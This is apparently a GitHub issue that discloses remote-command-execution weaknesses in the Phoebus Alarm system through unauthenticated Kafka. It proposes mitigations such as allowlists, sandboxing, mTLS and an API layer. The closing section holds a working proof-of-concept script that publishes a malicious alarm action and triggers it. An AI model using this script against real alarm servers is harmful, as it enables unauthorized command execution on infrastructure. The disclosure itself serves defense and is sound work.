Security concerns of the Phoebus Alarm system #3702

@minijackson

While evaluating Phoebus Alarm for deployment on our infrastructure, I found some things that I consider security-related, and I thought it would be good to bring them to your attention.

These security issues are made worse by the fact that alarm servers often sit on the edge of several networks: they are often on both the "IOC network" and an "outside network" used for sending notifications.

  • If the Kafka server is configured without mutual TLS or TLS+Authentication, then the server is trivially vulnerable to Remote Command Execution (RCE).
  • If the Kafka server is configured to listen on every network interface, then that RCE can be triggered from the outside network.
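
A quick way to check the second point is to test, from a machine on the outside network, whether the broker port accepts TCP connections at all. The following is a minimal sketch using only the standard library; the function name `is_port_reachable` is made up for illustration, and the host and port in the usage note are the same placeholder values as in the proof of concept further down.

```python
import socket


def is_port_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within `timeout` seconds."""
    try:
        # create_connection resolves the host name and performs the TCP handshake.
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and name-resolution failures.
        return False
```

Running `is_port_reachable("my-kafka-server", 9092)` from the outside network and getting `True` only shows that the port is open there; it says nothing about whether TLS or authentication is enforced.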

Running arbitrary commands

Right now, the configuration sent by the operator can set any arbitrary command to run when an alarm is triggered.

From a usability perspective, I'm not sure every operator knows the Linux command line, the tools installed on the phoebus-alarm server, or even the exact notification policies.

From a security perspective, this is quite bad. The closest Common Weakness Enumeration (CWE) entry that I could find is CWE-78 (OS Command Injection), but I'm not sure I'd call it an "injection" if the whole command is arbitrary.

The CWE-78 page provides some mitigation options:

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

    • I personally think that's our best option: make a list of available commands on the server side, and only provide this list to the client side.
      This way, operators can't run arbitrary commands and would only choose something that makes sense in the context of the project.
  • Use library calls rather than external processes to recreate the desired functionality

    • That's already done for emails. In my opinion it could also be done for things like HTTP webhooks, but it's going to be complicated to offer something that satisfies every use case.
  • Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system.

    • Right now, sandboxing is left to the system administrator, and I didn't find any guidance in the Phoebus documentation on sandboxing phoebus-alarm-server.
      The documentation could be improved to suggest using a sandboxed environment (such as containers or systemd service hardening) and a Linux security module (SELinux, AppArmor).
    • CWE-78 also mentions using Java's SecurityManager to sandbox the process, although SecurityManager has been deprecated for removal since Java 17.
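
To make the "accept known good" option more concrete, here is a minimal sketch of a server-side allowlist, written in Python for brevity rather than as a patch to the Java code of phoebus-alarm-server. Everything in it is an assumption for illustration: the action names, the paths in `ALLOWED_ACTIONS`, and the idea that the `cmd:` prefix would carry a name instead of a full command line.

```python
import subprocess

# Hypothetical server-side allowlist: action name -> fixed argument vector.
# Only the administrator of the alarm server edits this table.
ALLOWED_ACTIONS = {
    "notify-oncall": ["/usr/local/bin/notify-oncall"],
    "log-alarm": ["/usr/bin/logger", "-t", "phoebus-alarm", "alarm triggered"],
}


def resolve_action(details: str) -> list[str]:
    """Map a 'cmd:<name>' action to its allowlisted argv, or raise ValueError."""
    prefix = "cmd:"
    if not details.startswith(prefix):
        raise ValueError(f"not a command action: {details!r}")
    name = details[len(prefix):].strip()
    try:
        # Return a copy so callers cannot mutate the allowlist entry.
        return list(ALLOWED_ACTIONS[name])
    except KeyError:
        raise ValueError(f"command {name!r} is not on the allowlist") from None


def run_action(details: str) -> subprocess.CompletedProcess:
    """Run an allowlisted action without involving a shell."""
    argv = resolve_action(details)
    # argv comes entirely from the server-side table, never from the client.
    return subprocess.run(argv, check=False, timeout=30)
```

With this shape, an action such as `cmd:/usr/bin/env touch /tmp/pwned.txt` is rejected by `resolve_action`, and the client only ever needs the list of names.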

Exposed Kafka

The fact that Kafka has to be exposed to the IOC and Operator networks means that anyone on those networks (unless Kafka uses mTLS and/or authentication) can configure alarms, configure the command to run on alarm, and trigger alarms. Even if mTLS and/or authentication is used, authenticated operators still have permission to trigger alarms, which doesn't make sense to me (I haven't found clear guidance on how to set up granular Kafka permissions).

From an architecture standpoint, I think it would have been more secure and future-proof to "hide" Kafka from the outside world.

Most installations only need a single Kafka server, which could listen only on the local network interface, and communication to and from the Phoebus client could go through an HTTP API (and/or websockets, EPICS CA/PVA, or something else for PubSub).
This way, reads and writes can be authenticated and authorized by the phoebus-alarm-server, and from an architecture design point of view, it becomes simpler to replace Kafka if we want a competing implementation.
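
As a rough illustration of the kind of check such an API layer could apply before forwarding a write to Kafka, here is a small sketch. The role names and the permission table are hypothetical; the `config:` and `state:` key prefixes are the ones used in the proof of concept below.

```python
# Hypothetical roles and the message-key prefixes each one may write.
WRITE_PERMISSIONS = {
    "operator": ("config:",),     # may edit alarm configuration
    "alarm-server": ("state:",),  # only the server publishes alarm state
}


def may_write(role: str, key: str) -> bool:
    """Return True if `role` is allowed to publish a message with this key."""
    # Unknown roles map to an empty tuple, for which startswith() is always False.
    return key.startswith(WRITE_PERMISSIONS.get(role, ()))
```

Under these assumptions, `may_write("operator", "state:/Accelerator/ALARM_TEST")` is `False`, so an authenticated operator could no longer trigger an alarm directly.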

I also had to search pretty deep to find the Phoebus documentation that explains how to encrypt Kafka traffic, and how to add authentication to Kafka. It would be good to mention clearly to sysadmins that the Kafka cluster should either be completely isolated/in a trusted environment, or encrypted/authenticated.
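
For reference, this is roughly what a client connection looks like once the broker requires mutual TLS, sketched with the same kafka-python-ng module as the proof of concept below. The helper names and all file paths are placeholders, and the sketch assumes the broker exposes an SSL listener that requires client certificates (`ssl.client.auth=required` on the Kafka side).

```python
def mtls_client_kwargs(bootstrap: str, cafile: str, certfile: str, keyfile: str) -> dict:
    """Build kafka-python client arguments for a mutual-TLS connection."""
    return {
        "bootstrap_servers": bootstrap,
        "security_protocol": "SSL",   # TLS on the wire
        "ssl_cafile": cafile,         # CA used to verify the broker certificate
        "ssl_certfile": certfile,     # client certificate presented to the broker
        "ssl_keyfile": keyfile,       # private key for the client certificate
        "ssl_check_hostname": True,   # reject certificates for another host name
    }


def make_producer(bootstrap: str, cafile: str, certfile: str, keyfile: str):
    """Create a KafkaProducer over mutual TLS (requires kafka-python-ng)."""
    # Imported lazily so the helper above can be used without the module installed.
    from kafka import KafkaProducer

    return KafkaProducer(**mtls_client_kwargs(bootstrap, cafile, certfile, keyfile))
```

A client without a certificate signed by the expected CA should then fail the TLS handshake instead of being able to publish.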

Proof of concept

Proof of concept attack script (needs the kafka-python-ng Python module):
import json

from kafka import KafkaProducer


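def main():
    # Plaintext, unauthenticated connection: this is the exposure being demonstrated.
    producer = KafkaProducer(bootstrap_servers="my-kafka-server:9092")

    # Step 1: publish an alarm configuration whose action runs an arbitrary command.
    print("Configuring alarm")
    config = {
        "user": "root",
        "host": "localhost.localdomain",
        "description": "The Alarm",
        "actions": [
            {
                "title": "pwn",
                "details": "cmd:/usr/bin/env touch /tmp/pwned.txt",
            },
        ],
    }
    producer.send(
        "Accelerator",
        key=b"config:/Accelerator/ALARM_TEST",
        value=json.dumps(config).encode(),
    )

    # Step 2: publish an alarm state so that the configured action fires.
    print("Sending alarm")
    state = {"severity": "MAJOR", "message": "You've been pwned"}
    producer.send(
        "Accelerator",
        key=b"state:/Accelerator/ALARM_TEST",
        value=json.dumps(state).encode(),
    )

    # send() is asynchronous; flush so both messages are delivered before exit.
    producer.flush()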


if __name__ == "__main__":
    main()
